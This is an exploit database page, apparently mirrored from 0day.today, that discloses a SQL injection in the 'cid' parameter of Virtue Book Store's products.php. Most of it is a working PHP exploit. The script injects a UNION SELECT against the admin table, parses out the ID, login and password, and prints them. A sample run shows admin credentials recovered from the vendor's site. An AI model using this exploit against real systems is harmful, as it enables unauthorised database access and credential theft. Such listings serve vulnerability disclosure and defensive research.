Lucene search

K

Virtue Book Store (cid) Remote SQL Injection Vulnerability

πŸ—“οΈΒ 08 Jun 2009Β 00:00:00Reported byΒ OzXTypeΒ 
zdt
Β zdt
πŸ”—Β 0day.todayπŸ‘Β 21Β Views

Remote SQL injection vulnerability found in Virtue Book Store, affects products.php with cid parameter.

Show more
Code
==========================================================
Virtue Book Store (cid) Remote SQL Injection Vulnerability
==========================================================


CMS : Online Book Store
WEB  : http://www.virtuenetz.com/book/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]

Exploit :
<?
$web  = $argv[1];
$url = $web."products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>

Ejemplo :
[emailΒ protected]:~/Escritorio$ php exploit.php http://www.virtuenetz.com/book/

ID :1
Usuario : admin
Password : admin



#  0day.today [2018-02-17]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Jun 2009 00:00Current
7.1High risk
Vulners AI Score7.1
21
.json
Report